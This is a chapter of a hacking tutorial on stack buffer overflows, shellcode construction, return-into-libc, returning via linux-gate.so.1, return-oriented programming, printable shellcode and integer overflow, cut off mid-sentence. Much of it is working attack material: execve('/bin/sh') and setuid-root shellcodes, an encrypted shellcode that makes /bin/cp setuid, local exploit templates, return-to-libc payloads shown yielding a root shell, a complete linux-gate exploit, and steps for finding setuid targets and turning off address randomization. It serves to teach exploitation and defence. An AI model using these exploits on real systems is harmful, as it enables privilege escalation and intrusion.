Hackers Hut: Smashing The Stack

10. Smashing The Stack

A special case of the use of active data is the buffer overflow. A decent programmer proves to himself on every single array access that the index is within bounds. But many people are lazy and just allocate the arrays "sufficiently large" without ever checking for overflow. Usually it is possible to crash such programs presenting them with sufficiently large data.

Typically one invokes them with

% foo `perl -e 'print "A"x5000'`

(that is, a string of 5000 A's). If the program crashes, then it is vulnerable. The A's overwrite something past the end of some array. If the array is local, that is, allocated on the stack, then, on machines on which the stack grows downwards, this overwrites the return address of this subroutine, and the program jumps to some random place and crashes.

The long string can come from a command line argument, from stdin, from an environment variable, etc.

Once a vulnerable program has been found, we redo the experiment, this time with a carefully chosen string instead of just a lot of A's. If we overwrite the return address of the subroutine, making it point at the array, then, when the subroutine returns, it jumps into the array, and executes what was written there.

(Again nostalgia - we did something very similar in 1971, on the Algol system of the X8, to take control of the machine and make it talk to its PDP8 neighbour.)

We need to know the architecture of the machine to write the right machine instructions, and there may be special difficulties because for example the string cannot contain NULs or nonprinting characters or so, and we must know the operating system, but usually it is possible to write suitable code to make the program do whatever we want. If the program is conversational, maybe we want an interactive shell.

Of course, all of this is only useful when the program has capabilities that we do not have ourselves. Either because it runs on a machine we do not have access to, or because it is setuid root or so.

The classic paper on this topic is Smashing The Stack For Fun And Profit by Aleph One. It is so clear and explicit that there is very little to add. Let us do some exercise.

Exercise Find a vulnerable program, not necessarily setuid. Make it spawn a shell.

Let me record an example.

% zile `perl -e 'print "A"x5000'`
Zile crashed.  Please send a bug report to <sandro@sigala.it>.
Trying to save modified buffers (if any)...

(The terminal was left in a funny state, cleaned up by reset followed by Ctrl-j (linefeed, not Enter).)

OK. Now that we can crash it, we can overflow the stack in a more controlled way. The first few attempts fail, and closer investigation shows that the argument is regarded as a pathname, and is picked apart into directory and filename, and then combined again. All three buffers have length 4096. We have best control over what happens when the overflow only happens at this combining stage. So, make the shellcode start with '/' instead of NOP, then the first half is directory, the second half is filename, and combined they overflow the pathname array. The resulting code is almost identical to that of Aleph One. Now

% ./egg3a 4150 12000
% zile $EGG
sh-2.05b$ TERM=xterm reset<ctrl-j>
sh-2.05b$

Success! (The call of egg3a puts EGG in the environment and spawns a new shell. That shell execs zile with a very long command line argument. The buffer overflow in zile is now exploited and gives a third shell, with different prompt since the environment, and in particular PS1, was not copied. Giving Ctrl-D twice brings us back in the original shell.)

Of course zile is not setuid root, so this was only playing. In hundreds of situations this technique gives a break-in, both locally and remotely.

Problem Find all local setuid programs, e.g. by

% find / -type f -perm +06000

What do they do? Why are they setuid? Can any of these be crashed by using long input strings, file names, environment variables, resource names, etc.? Can any of these be broken into?

The paper The Frame Pointer Overwrite by klog shows that an off-by-one error may suffice to get a working exploit. (Instead of overwriting the return address one overwrites the frame pointer, which later gets moved into the stack pointer, so that the next function return will pop a chosen value from the stack as new EIP.)

10.1 Shellcodes

Shellcode is the name for strings that code some function, like spawning a shell, The code must be compact and self-contained, so that it can be used in e.g. buffer overflow exploits.

Lots of special purpose shellcodes have been developed for all imaginable systems and architectures. Examples can be found many places, such as on antifork.org and shellcode.org (defunct) and www.shellcode.com.ar.

Example

Let us look at a very small example (Linux on i386). Shellcode: j\x0bX\x99Rhn/shh//bi\x89\xe3RS\x89\xe1\xcd\x80.

  6a 0b                   push   $0xb           # 11: execve
  58                      pop    %eax
  99                      cltd
  52                      push   %edx
  68 6e 2f 73 68          push   $0x68732f6e    # n/sh
  68 2f 2f 62 69          push   $0x69622f2f    # //bi
  89 e3                   mov    %esp,%ebx
  52                      push   %edx
  53                      push   %ebx
  89 e1                   mov    %esp,%ecx
  cd 80                   int    $0x80          # system call

A Linux system call is done using the instruction int $0x80, with the system call number in the EAX register, and the parameters in EBX, ECX, EDX, ... In this case we want to do an execve() call. The prototype is

int execve(char *name, char *argv[], char *envp[]);

and we are going to construct the call execve("/bin/sh", argv, NULL); where argv is a pointer to an array of two elements, namely "/bin/sh", NULL.

The first two instructions put 11 (the number of execve) in EAX. The third instruction extends the 32-bit integer EAX to the 64-bit integer EDX,EAX, that is, sets EDX to -1 if EAX is negative and to 0 otherwise. Here EDX is cleared. The next four instructions push "//bin/sh" on the stack (with terminating 0) and assign the address of this string to EBX. The next three instructions construct the array of two elements and assign its address to ECX. Then the system call is done. The string can be tested by the conventional

char shellcode[] = "j\x0bX\x99Rhn/shh//bi\x89\xe3RS\x89\xe1\xcd\x80";

main() {
   long *ret;

   ret = (long *)&ret + 2;
   (*ret) = (long)shellcode;
}

(The pointer ret is set to point to the return address of main(), two 4-byte integers higher on the stack, and the address of the shellcode is written there, so that main() returns into the shellcode.) Here an optimizing compiler might optimize the entire body away, so it is better to use e.g.

main() {
   int (*ret)();
   ret = shellcode;
   ret();
}

Construction

Aleph One already explained how to construct shellcode. Here another tutorial.

Let us give one more example. A setuid program can drop privileges temporarily, and we would like to have full privileges when a shell is spawned (or some other interesting action is performed). So we want to restore privileges first, and setresuid(0,0,0) does that. Then let us change our program /tmp/.x to be setuid root.

int main() {
        setresuid(0,0,0);
        chown("/tmp/.x", 0, 0);
        chmod("/tmp/.x", 04755);
        exit(0);
}

We do not want to go through libc, so want the bare system calls. Insert the corresponding macros.

#include <linux/unistd.h>
_syscall3(int,setresuid,int,r,int,e,int,s)
_syscall3(int,chown,char*,f,int,u,int,g)
_syscall2(int,chmod,char*,f,int,m)
_syscall1(int,exit,int,r)

Also insert a declaration for errno since that is used by these syscall macros.

int errno;

Now compile and look at the result.

% cc -S sc.c
% cat sc.s
...
setresuid:
        pushl   %ebp
        movl    %esp, %ebp        // standard procedure entrance
        pushl   %ebx              // save register
        subl    $4, %esp          // space for temp
        movl    $164, %eax
        movl    8(%ebp), %ebx
        movl    12(%ebp), %ecx
        movl    16(%ebp), %edx
        int $0x80
        movl    %eax, -8(%ebp)    // store result in temp
        cmpl    $-126, -8(%ebp)   // compare with -126
        jbe     .L3               // below or equal?
        movl    -8(%ebp), %eax    // no, an error code
        negl    %eax
        movl    %eax, errno       // put it in errno
        movl    $-1, -8(%ebp)     // and return -1
.L3:
        movl    -8(%ebp), %eax
        addl    $4, %esp
        popl    %ebx
        ret
...

The int $0x80 is the system call, and the four instructions in front just set up the call. Before that there is a standard procedure entrance (save frame pointer, set new frame pointer, save register, reserve space for temp). What is all this stuff afterwards? It is the handling of error returns. When the return value is in the range [-125,-1] it is the negative of an error value, and the error value is stored in errno, and -1 is returned. Otherwise the system call return value is returned unchanged. Discard everything except for the actual call. Our assembly becomes

setresuid:
        movl    $164, %eax
        movl    $0, %ebx
        movl    $0, %ecx
        movl    $0, %edx
        int $0x80
chown:
        movl    $182, %eax
        movl    $.name, %ebx
        movl    $0, %ecx
        movl    $0, %edx
        int $0x80
chmod:
        movl    $15, %eax
        movl    $.name, %ebx
        movl    $04755, %ecx
        int $0x80
exit:
        movl    $1, %eax
        movl    $0, %ebx
        int $0x80
.name:  .string "/tmp/.x"

Try whether this really works. Put it inside a C program and run.

int main() {
asm(
"        movl    $164, %eax  \n"
...
"                int $0x80   \n"
".name:  .string \"/tmp/.x\" \n"
);
}

Compile and run, and yes - this works.

% ls -l /tmp/.x
-rwxr-xr-x    1 aeb      666 2004-04-01 19:25 /tmp/.x
% cc -o sc sc.c
% su
# ./sc
-rwsr-xr-x    1 root     666 2004-04-01 19:25 /tmp/.x

Now look at the generated code.

% objdump -d ./sc
...
0804831c <setresuid>:
 804831c:       b8 a4 00 00 00          mov    $0xa4,%eax
 8048321:       bb 00 00 00 00          mov    $0x0,%ebx
 8048326:       b9 00 00 00 00          mov    $0x0,%ecx
 804832b:       ba 00 00 00 00          mov    $0x0,%edx
 8048330:       cd 80                   int    $0x80

08048332 <chown>:
 8048332:       b8 b6 00 00 00          mov    $0xb6,%eax
 8048337:       bb 65 83 04 08          mov    $0x8048365,%ebx
 804833c:       b9 00 00 00 00          mov    $0x0,%ecx
 8048341:       ba 00 00 00 00          mov    $0x0,%edx
 8048346:       cd 80                   int    $0x80

08048348 <chmod>:
 8048348:       b8 0f 00 00 00          mov    $0xf,%eax
 804834d:       bb 65 83 04 08          mov    $0x8048365,%ebx
 8048352:       b9 ed 09 00 00          mov    $0x9ed,%ecx
 8048357:       cd 80                   int    $0x80

08048359 <exit>:
 8048359:       b8 01 00 00 00          mov    $0x1,%eax
 804835e:       bb 00 00 00 00          mov    $0x0,%ebx
 8048363:       cd 80                   int    $0x80

08048365 <.name>:
 8048365:       2f 74 6d 70 2f 2e 78 00

Lots of NUL bytes. No good if we want to put this into a string used to overflow a buffer. Let us replace each mov $0,R by xor R,R. And replace the 4-byte moves of small values by single byte or 2-byte moves. This yields

    31 c0                   xorl    %eax,%eax
    b0 a4                   movb    $0xa4,%al
    31 db                   xorl    %ebx,%ebx
    31 c9                   xorl    %ecx,%ecx
    31 d2                   xorl    %edx,%edx
    cd 80                   int     $0x80
    31 c0                   xorl    %eax,%eax
    b0 b6                   movb    $0xb6,%al
    bb ?? ?? ?? ??          movl    $.name,%ebx
    31 c9                   xorl    %ecx,%ecx
    31 d2                   xorl    %edx,%edx
    cd 80                   int     $0x80
    31 c0                   xorl    %eax,%eax
    b0 0f                   movb    $0xf,%al
    bb ?? ?? ?? ??          movl    $.name,%ebx
    31 c9                   xorl    %ecx,%ecx
    66 b9 ed 09             movw    $0x9ed,%cx
    cd 80                   int     $0x80
    31 c0                   xorl    %eax,%eax
    40                      inc     %eax
    31 db                   xorl    %ebx,%ebx
    cd 80                   int     $0x80
.name:
    2f 74 6d 70 2f 2e 78 00

Much smaller, and no NULs. The only problem is that if we run this code in some random context, the address of .name will be something unknown. Three solutions: (i) put this string at some known address, (ii) push the string on the stack, (iii) find out where we are in memory and compute the address of .name.

For a local attack approach (i) works, even though it is a bit clumsy: put FN=/tmp/.x in the environment, and then ask for the address of this string. Note that the address will go down by 2 each time the length of the program name is increased by 1.

In the 23-byte shell code above we saw approach (ii). Let us do (iii) here.

The standard approach is to put a JMP to the end at the start of the shell code, and a CALL to just after the JMP at the end of the shell code. That CALL will put our current address on the stack. (The JMP is just to get a CALL with a negative offset, since a small positive offset would give an instruction containing a NUL.)

    eb 2c                   jmp     .call
.begin:
    31 c0                   xorl    %eax,%eax
    b0 a4                   movb    $0xa4,%al
    31 db                   xorl    %ebx,%ebx
    31 c9                   xorl    %ecx,%ecx
    31 d2                   xorl    %edx,%edx
    cd 80                   int     $0x80
    31 c0                   xorl    %eax,%eax
    b0 b6                   movb    $0xb6,%al
    5b                      pop     %ebx
    53                      push    %ebx
    31 c9                   xorl    %ecx,%ecx
    31 d2                   xorl    %edx,%edx
    cd 80                   int     $0x80
    31 c0                   xorl    %eax,%eax
    b0 0f                   movb    $0xf,%al
    5b                      pop     %ebx
    31 c9                   xorl    %ecx,%ecx
    66 b9 ed 09             movw    $0x9ed,%cx
    cd 80                   int     $0x80
    31 c0                   xorl    %eax,%eax
    40                      inc     %eax
    31 db                   xorl    %ebx,%ebx
    cd 80                   int     $0x80
.call:
    e8 cf ff ff ff          call    .begin
.name:
    2f 74 6d 70 2f 2e 78 00

Another example

Suppose one finds the shell code

"\x2b\xc9\x83\xe9\xf2\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x70"
"\xce\x9d\x91\x83\xeb\xfc\xe2\xf4\x1a\xc5\xc5\x08\x22\xa8\xf5\xbc"
"\x13\x47\x7a\xf9\x5f\xbd\xf5\x91\x18\xe1\xff\xf8\x1e\x47\x7e\xc3"
"\x98\xda\x9d\x91\x70\xad\xf5\xfc\x1f\xaa\xbd\xa1\x44\xf9\xa8\xa4"
"\x50\xe1\xff\xf8\x1e\xe1\xfe\xe1\x70\x99\xce\x18\x91\x03\x1d\x91"

- what does it do? Put it in a small C program and disassemble to get

00000000 <sc>:
   0:   2b c9                   sub    %ecx,%ecx
   2:   83 e9 f2                sub    $0xfffffff2,%ecx
   5:   d9 ee                   fldz   
   7:   d9 74 24 f4             fnstenv 0xfffffff4(%esp)
   b:   5b                      pop    %ebx
   c:   81 73 13 70 ce 9d 91    xorl   $0x919dce70,0x13(%ebx)
  13:   83 eb fc                sub    $0xfffffffc,%ebx
  16:   e2 f4                   loop   c <sc+0xc>
  18:   1a c5                   sbb    %ch,%al
  1a:   c5 08                   lds    (%eax),%ecx
  1c:   22 a8 f5 bc 13 47       and    0x4713bcf5(%eax),%ch
  22:   7a f9                   jp     1d <sc+0x1d>
  24:   5f                      pop    %edi
  25:   bd f5 91 18 e1          mov    $0xe11891f5,%ebp
  2a:   ff                      (bad)  
...

The start looks reasonable, but soon it becomes garbage. First we set ECX to -14. Then we do a harmless floating point instruction. Then we store the 28-byte FPU environment at the address ESP-12. Bytes 12-15 of this environment are the address of the last floating point instruction, that is, of the fldz, and that address is now written to top of stack, and popped into EBX. (Above we used a call to get an address on the stack. This is trickier: the combination fldz, fnstenv will probably defeat single stepping in most debuggers.) Then follows a loop that XORs the next 14*4 bytes with the constant 0x919dce70. Aha, that explains the garbage. We have to decrypt, and then find

  18:   6a 0b                   push   $0xb
  1a:   58                      pop    %eax
  1b:   99                      cltd
  1c:   52                      push   %edx
  1d:   66 68 2d 63             pushw  $0x632d          ; -c
  21:   89 e7                   mov    %esp,%edi
  23:   68 2f 73 68 00          push   $0x68732f        ; /sh
  28:   68 2f 62 69 6e          push   $0x6e69622f      ; /bin
  2d:   89 e3                   mov    %esp,%ebx
  2f:   52                      push   %edx
  30:   e8 14 00 00 00          call   49 <sc+0x49>
  35:   63 68 6d 6f 64 20 30 34 37 35 35 20 2f 62 69 6e 2f 63 70 00
; chmod 04755 /bin/cp
  49:   57                      push   %edi
  4a:   53                      push   %ebx
  4b:   89 e1                   mov    %esp,%ecx
  4d:   cd 80                   int    $0x80

In other words, the system call execve("/bin/sh",["/bin/sh","-c","chmod 04755 /bin/cp",0],0) is done. Note that this part may contain NULs since they were XORed earlier. Of course the construction is completely general: the string can contain arbitrary shell commands, and is encrypted so that the function of the shell code is not immediately obvious.

10.2 Programming details

In order to apply the buffer overflow in more general situations, it helps to know the precise memory layout of the program being attacked. Below some Linux details (for the i386 architecture).

The stack looks as follows. First of all, on almost all architectures, it grows downward, from high addresses to low addresses. On i386 the stack pointer points at the most recent byte pushed. On the stack we meet (from high to low addresses):

NULL
program name
environment strings
argv strings
platform string
ELF Auxiliary Table
NULL that ends envp[]
environment pointers
NULL that ends argv[]
argv pointers
argc
stack from startup code
envp
argv
argc
return address of main
saved registers of main
local variables of main
...

Details depend a bit on the compiler and (g)libc version used, whether the binary is a.out or ELF, whether is was compiled statically or uses dynamic libraries, etc.

Exercise Write a C program that prints out the stack. Try to explain what you find.

An easy variation on the theme of buffer overflow was described by Murat Balaban in bof-eng.txt. Fork off the vulnerable utility with an environment containing only one environment variable, where that single variable contains the shell code. Now we know precisely where the shell code starts, namely at 0xbffffffa - strlen(program_name) - strlen(shell_code). (The reason that we have 0xbffffffa instead of 0xc0000000 is that there are two closing NULs and a final 4-byte NULL.) The buffer overflow can just overwrite the buffer with copies of this address. The typical local exploit now looks somewhat like

#define BUFSZ 500
#define ALIGNMENT 0
#define PATH "/path/to/vulnerable/utility"

char shellcode[]="..my_favorite_shellcode..";
char buf[BUFSZ];

int main() {
        char *env[2] = {shellcode, NULL};
        int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH);
        int i, *p = (int *)(buf + ALIGNMENT);

        for (i = 0; i+4 < BUFSZ; i += 4)
                *p++ = ret;

        return execle(PATH, PATH, buf, NULL, env);
}

Note that some systems use a random variation in the location of top-of-stack (say, 0xc0000000 minus a small amount), and this spoils this easy direct approach.

Note that some systems use an entirely different top-of-stack (say, 0xff000000).

10.3 Non-executable stack

Buffer overflows have been found by the thousands, and instead of fixing every individual vulnerable program people have tried to come up with general protections.

Some protection against these kinds of exploits is provided by Solar Designer's non-executable stack patch, see also here.

However, some more ingenuity produces other exploits in the category of buffer overflows. After all, the main ingredient is that the overflow overwrites the return address of the current function, and if the stack is not executable then the shellcode must be somewhere else. See for example Solar Designer's article Getting around non-executable stack, and Nergal's Defeating Solar Designer non-executable stack patch.

On 2003-05-02, Ingo Molnar released his exec-shield that is a superversion of Solar Designer's non-executable stack patch. On Linux systems protected in this way it is much harder to perform the usual kind of buffer overflow exploit. (But see below.) Here a writeup of some common protection measures.

10.4 Returning into libc

What if we are on a system with non-executable stack? Or a system that carefully distinguishes between data and instructions, so that our data will not be executable? Then the return address must be overwritten with an address of our choice that points at executable code that was present already.

The standard trick is to use the system() libc library call. We'll do a system("/bin/sh") call. Make the return address point at system(), and prepare the stack so that this routine finds its argument on the stack. We need the addresses of system() and "/bin/sh" and (for a clean exit) of exit().

First find the addresses of system() and exit() in libc:

% cat > fa.c
extern int system(), exit();
main() {
        printf("system: 0x%08x\n", system);
        printf("exit: 0x%08x\n", exit);
}
^D
% cc -o fa fa.c
% ./fa
system: 0x080482a0
exit: 0x080482d0

Hm. Libc lives around 0x40000000, but here we get 0x08000000 type addresses. Try again with gdb:

% gdb fa
(gdb) p system
$1 = {<text variable, no debug info>} 0x80482a0
(gdb) break main
Breakpoint 1 at 0x80483a2
(gdb) run
Starting program: /home/aeb/ctest/fa 

Breakpoint 1, 0x080483a2 in main ()
(gdb) p system
$2 = {<text variable, no debug info>} 0x4006d4b0 <system>
(gdb) p exit
$3 = {<text variable, no debug info>} 0x40057fb0 <exit>
(gdb) q

Aha. The library addresses are 0x4006d4b0 and 0x40057fb0 and the procedure linkage table (.plt) addresses are 0x080482a0 and 0x080482d0.

Less primitive is to use dlsym(). E.g.,

% cat > fa2.c
#include <stdio.h>
#include <dlfcn.h>

main() {
        void *h, *p;

        h = dlopen(NULL, RTLD_LAZY);
        p = dlsym(h, "system");
        printf("0x%08x\n", p);
        p = dlsym(h, "exit");
        printf("0x%08x\n", p);
}
^D
% cc -o fa2 fa2.c -ldl
% ./fa2
0x400704b0
0x4005afb0

Help! Different addresses. Why?

% ldd ./fa
                libc.so.6 => /lib/i686/libc.so.6 (0x4002c000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
% ldd ./fa2
                libdl.so.2 => /lib/libdl.so.2 (0x4002c000)
        libc.so.6 => /lib/i686/libc.so.6 (0x4002f000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
% python
>>> 0x400704b0-0x4002f000
267440
>>> 0x4006d4b0-0x4002c000
267440
>>>

OK. So, when we exploit a program, we must do an ldd to find out where the libraries are, and then system has an offset of 267440 from the start of libc (on this machine here). Of course the offset depends on the library version (and on the compiler used to compile the library). This is not a big problem. In almost all cases libc comes from some Linux distribution, probably a known distribution, and we can investigate the libc for that distribution, and also the ldd output for the target program for that distribution.

Then "/bin/sh". Either put it in an environment variable and find the address, or find the existing copy in libc. E.g.,

% cat > fa1.c
main(){
        char *p;

        p = 0x4002c000;
        while (1) {
                while (*p++ != '/') ;
                if (strcmp(p-1, "/bin/sh") == 0) {
                        printf("0x%08x\n", p-1);
                        return 0;
                }
        }
}
^D
% cc -o fa1 fa1.c
% ./fa1
0x40151439

That was the preparation: on this system we have system, exit and "/bin/sh" with offsets 267440, 180144, 1201209 from the start of libc.

Now for the exploit. When a function is called, one first pushes the parameters, and the last instruction is the call instruction, and it pushes the return address. So, at entrance, the function expects on the stack a return address followed by the parameters.

If we write the three words (i) address of system, (ii) address of exit, (iii) address of "/bin/sh" on the stack in such a way that part (i) overwrites the return address of the function, then the ret of the function will jump to system, and we'll do a system("/bin/sh"), and afterwards return to the address of exit. Neat.

So, this is a precise exploit: we must know precisely where to write, that is, we must know how far the return address is from the start of the buffer that we overflow. Let us try an example.

% cat > vuln.c
int main(int argc, char **argv) {
        char buff[30];

        if (argc == 2)
                strcpy(buff, argv[1]);
        return 0;
}
^D
% cc -o vuln vuln.c
% ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault
% ./vuln `perl -e 'print "A"x44 . "\xb0\xd4\x06\x40" . "\xb0\x7f\x05\x40" . "\x39\x14\x15\x40"'`
sh-2.05b$

Yes. So this works.

(More generally, this stuff with NOP sledge and guessing is only needed for a remote exploit where we don't know precisely where things are in memory. In a Linux environment, usually no guessing is needed.)

10.5 Returning into libc - getting root

The above worked and all is well for an exploit where the invoker of the vulnerable program is root. Perfect for the remote exploit of some daemon that runs as root. But what about local exploits of some vulnerable setuid root binary?

# chown root vuln
# chmod 04555 vuln
% ./vuln `perl -e 'print "A"x44 . "\xb0\xd4\x06\x40" . "\xb0\x7f\x05\x40" . "\x39\x14\x15\x40"'`
sh-2.05b$ id
uid=500(aeb) ...

Ach. This shell drops privileges. I get a shell prompt, but not a root shell prompt. Useless for local exploits. We would like to do setuid(0) first. That would work if we could put the sequence

setuid | system | 0 | "/bin/sh"

on the stack, but that is not so easy. (Here, setuid uses the argument 0, and returns to system which uses the argument "/bin/sh" and then crashes because we left out the exit this time.) Finding the addresses goes like before, but 0 is a bad value. So, this will only get us some obscure user ID without NUL bytes.

Replacing "/bin/sh" by some other command does not help, because it is the shell that is implicit in system() that drops privileges.

Then maybe we do not want to call system() at all, and instead do an execl() of our favourite program that starts with setuid(0). Like this

% cat > fav.c
main() { setuid(0); execl("/bin/sh", "/bin/sh", 0); }

We need a stack like

execl | xxx | fav | fav | 0

and again there is the problem with getting the 4-byte 0.

A beautiful trick uses printf with the %n format, just like we used for format exploits. Use a stack like

printf | execl | "%3$n" | fav | fav | here

Now the function return will jump to printf which will write 0 to where its third argument points, but it points to itself, and here is overwritten by 0. Then fav is executed, and we never return here.

A good plan. Ingredients needed: library addresses of printf and execl, we know how to find those. Next, the address of the format string, and of the name of our favourite program "/tmp/fav". Probably not found in libc. Put them in the environment, and find the address. Finally, the address here. Good that we have open source. Insert a print statement in the source of vuln.c to find that. Let us try:

% getlibcaddr printf
0x4007cab0
% getlibcaddr execl
0x400d8390
% export FMT="%3$n"
% export FAV="/tmp/fav"
% ln getenvaddr ./genv
% ./genv FMT
0xbfffff2d
% ./genv FAV
0xbffffce3
% ed vuln.c
140
3a
        printf("0x%08x\n", buff);
.
w vulx.c
167
q
% cc -o vulx vulx.c
% ./vulx
0xbffff530
% perl -e 'printf("0x%08x\n", 0xbffff530 + 44 + 20)'
0xbffff570
% ./vuln `perl -e 'print "A"x44 . "\xb0\xca\x07\x40" . "\x90\x83\x0d\x40" . "\x2d\xff\xff\xbf" . "\xe3\xfc\xff\xbf" . "\xe3\xfc\xff\xbf" . "\x70\xf5\xff\xbf"'`
sh-2.05b#

Success at first attempt. Note that addresses depend on the environment and on the length of the program name, so we first set up the desired environment, then look for addresses, and make sure that we do the looking with programs that have a name of the same length as the program to be exploited.

This was an example of returning into libc that assumed that libc addresses do not contain NUL bytes. If they do one may try to use .plt addresses, or jump to places or functions in the vulnerable executable instead of to libc. For a detailed discussion, see Nergal's paper in Phrack 58.

10.6 Address randomization

Recent Linux systems randomize addresses in at least two ways. On the one hand at startup the starting address of the stack is given a random offset. On the other hand, the return values of the mmap() system call are made random.

For testing and debugging purposes people need reproducible setups, and this randomization can be switched off.

% grep stack /proc/self/maps
bf97f000-bf995000 rw-p bf97f000 00:00 0          [stack]
% grep stack /proc/self/maps
bfdd3000-bfde9000 rw-p bfdd3000 00:00 0          [stack]
# echo 0 > /proc/sys/kernel/randomize_va_space
% grep stack /proc/self/maps
bffeb000-c0000000 rw-p bffeb000 00:00 0          [stack]
% grep stack /proc/self/maps
bffeb000-c0000000 rw-p bffeb000 00:00 0          [stack]

(Writing 0 to /proc/sys/kernel/randomize_va_space turns off randomization globally. On older Fedora systems one has /proc/sys/kernel/exec-shield{-randomize}. One can use setarch or some private utility to set the ADDR_NO_RANDOMIZE personality bit on program startup to turn off randomization for a single program invocation.)

Unfortunately, the ADDR_NO_RANDOMIZE bit is cleared when a setuid binary is started.

Also this is a serious obstacle for the usual buffer overflow exploits. But, see below.

10.7 Returning via `linux-gate.so.1`

If randomization of the stack address is defeated by returning into libc, then the next step in the defense is to randomize library addresses. Fortunately, Linux has one library that is generated by the kernel, common for all processes, always mapped at 0xffffe000, called linux-gate.so.1. In Neworder's newsletter13.txt izik describes how to make use of it.

Let the dummy vulnerable program be

/* va-vuln-poc.c */
#include <string.h>

int main(int argc, char **argv) {
        char buf[256];
        strcpy(buf, argv[1]);
        return 1;
}

Exploit it using

/*
 * va-exploit-poc.c, Exploiting va-vuln-poc.c 
 * under VA patch (Proof of Concept!)
 * - izik@tty64.org
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

char shellcode[] = 
        "\x6a\x0b"              // push $0xb 
        "\x58"                  // pop %eax 
        "\x99"                  // cltd 
        "\x52"                  // push %edx 
        "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f 
        "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f 
        "\x89\xe3"              // mov %esp,%ebx 
        "\x52"                  // push %edx 
        "\x53"                  // push %ebx 
        "\x89\xe1"              // mov %esp,%ecx 
        "\xcd\x80";             // int $0x80 

unsigned long find_esp(void) {
        int i;
        char *ptr = (char *) 0xffffe000;

        for (i = 0; i < 4095; i++) {
                if (ptr[i] == '\xff' && ptr[i+1] == '\xe4') {
                        printf("* Found JMP %%ESP @ 0x%08x\n", ptr+i);
                        return (unsigned long) ptr+i;
                }
        }

        return 0;
}

int main(int argc, char **argv) {
        char evilbuf[295];
        char *evilargs[] = { "./va-vuln-poc", evilbuf , NULL };
        unsigned long retaddr;

        retaddr = find_esp();

        if (!retaddr) {
                printf("* No JMP %%ESP in this kernel!\n");
                return -1;
        }

        memset(evilbuf, 0x41, sizeof(evilbuf));
        memcpy(evilbuf+268, &retaddr, sizeof(long));
        memcpy(evilbuf+272, shellcode, sizeof(shellcode));

        execve("./va-vuln-poc", evilargs, NULL);

        return 1;
}

The main program first finds a jmp %esp instruction in the current kernel's linux-gate.so.1. It gives up when no such instruction is found. Otherwise it does a precision exploit, overwriting the return address on the stack with the address of a jmp %esp, and putting the shellcode after that. A beautiful construction.

Let us try here. Hmm - due to compiler details the return address is found 4 bytes earlier. Change the above 268, 272 into 264, 268 and a shell is spawned.

Unfortunately, nowadays also linux-gate.so.1 is loaded at a random address. (On my i386. Also on my x86_64. But not on the latter machine in 32-bit mode...)

10.8 Return-oriented programming

If the target system is protected in such a way that no location that is writable also is executable, then one has to depend on the code that is already there. As a generalization of the return into libc or into linux-gate.so.1 one has "Return-oriented programming". Find many fragments of code consisting of one or two useful instructions followed by a ret. Chain them together by having a list of addresses of such fragments prepared on the stack. Each ret will jump to the next fragment. For a nice description, see Nergal's Phrack 58#4. (Of course, instructions with an effect similar to that of ret will do as well.) This means that NX technology is no longer a strong protection. ASLR (address space layout randomization) means that the pointers we use cannot point to objects that have randomized addresses. Maybe not to the stack, or to the environment, or to libc. That still leaves the code of the exploited program itself. Experience shows that every largish program has enough of these sequences to write arbitrary code. So, also ASLR can be defeated.

10.9 Printable shellcodes

Sometimes the shellcode used has to satisfy certain conditions, be all-ASCII or all-UTF8 or the result of encoding a URL. That makes designing an exploit more difficult but not impossible. Basic papers are Writing ia32 alphanumeric shellcodes by rix (p57-0x0f) and Building IA32 'Unicode-Proof' Shellcodes by obscou (p61-0x0b).

The NOP sledge uses NOP = 0x90, not printable. But there are lots of instructions that can be used instead, like @ = "inc %eax" or A = "inc %ecx" or H = "dec %eax". Thus, the NOP-sledge could be HAHAHAHA and include an @ if the string should look like an email address.

Roughly speaking, the most useful instructions that are ASCII bytes are

%	0x25	and %eax
-	0x2d	sub %eax
5	0x35	xor %eax
@, A, B, C, D, E, F, G	0x40-0x47	inc R
H, I, J, K, L, M, N, O	0x48-0x4f	dec R
P, Q, R, S, T, U, V, W	0x50-0x57	push R
X, Y, Z, [, \, ], ^, _	0x58-0x5f	pop R
a	0x61	popa
f	0x66	operand size prefix
g	0x67	address size prefix

where R = %eax, %ecx, %edx, %ebx, %esp, %ebp, %esi, %edi.

One can clear %eax using two AND instructions

        and $0x31313131, %eax
        and $0x46464646, %eax

(that is, "%1111%FFFF"), construct any desired value in %eax using at most four SUB instructions, and push the result on the stack. For example, the value 0x12345678 is pushed by

        sub $0x30304130, %eax
        sub $0x30307364, %eax
        sub $0x33317a7a, %eax
        sub $0x5a397a7a, %eax
        push %eax

(that is, "-0A00-ds00-zz13-zz9ZP"), starting from a zero %eax. Thus, arbitrary code can be created. The stack pointer can be set to any value by popping into %esp. Thus, arbitrary code can be created anywhere one wants.

For a nice self-contained exploit one can try to set %esp to some value a little bit higher than the current eip, push the desired exploit, set %eax to 0x90909090 (4 NOPs), and finish with a long tail PPPPP.... (where each P pushes four NOPs, and the idea is that the tail of this ASCII shellcode walks over onto the NOP sledge of the just-constructed code.

If the current address is unknown, but we got there by some buffer overflow, then probably the last thing that happened was the return that used the overwritten return address, and we find our present location by something like

        dec %esp
        dec %esp
        dec %esp
        dec %esp
        pop %ecx

that is the sequence "LLLLY".

Polymorphism

Since there is a large number of different ways of writing a given number as a sum of four "printable" numbers, any exploit can be encoded in an ASCII-only exploit as above in many different ways. The typical structure with repeated subtracts can be avoided by using XOR. Etc.

10.10 Integer overflow

Even if a utility is careful to check all lengths and sizes it may be vulnerable. The reason is that one intuitively reads code as if it talks about for example integers, but in reality it is about ints, and these are quite different animals.

Properties of ints:

They can be signed or unsigned. All arithmetic involving unsigned ints is done modulo 2^32 (on a 32-bit machine). Any comparison involving signed and unsigned integers is done by first casting everything to unsigned int. The C sizeof() operator returns an unsigned int.

As a result, the results of comparison, addition and multiplication may not be what one expected. Examples:

(1) In mathematics, and when working with signed integers, a < b is equivalent to a - b < 0, but this is false for unsigned integers (indeed, unsigned integers cannot be negative), so intuitively equivalent statements can have very different semantics.

Thus, if one wants to concatenate two strings of lengths len1 and len2 and store the result in the character array buf, then the test

